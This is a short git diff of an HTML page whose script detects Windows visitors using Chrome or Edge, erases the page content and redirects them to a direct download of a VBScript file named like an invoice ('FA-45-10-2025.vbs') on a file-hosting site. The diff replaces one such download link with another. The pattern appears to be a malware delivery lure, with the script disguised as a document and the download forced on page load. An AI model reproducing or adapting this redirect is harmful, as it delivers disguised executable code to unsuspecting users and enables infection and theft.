--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-par-2.gofile.io/download/direct/16e109e4-19b9-419b-8de8-62bb568df1e9/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://cold4.gofile.io/download/direct/1bd6445a-e319-4ec9-ad21-d71176162a17/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -169,6 +169,7 @@
   </div>
 </body>
 </html>
+
 
 
 
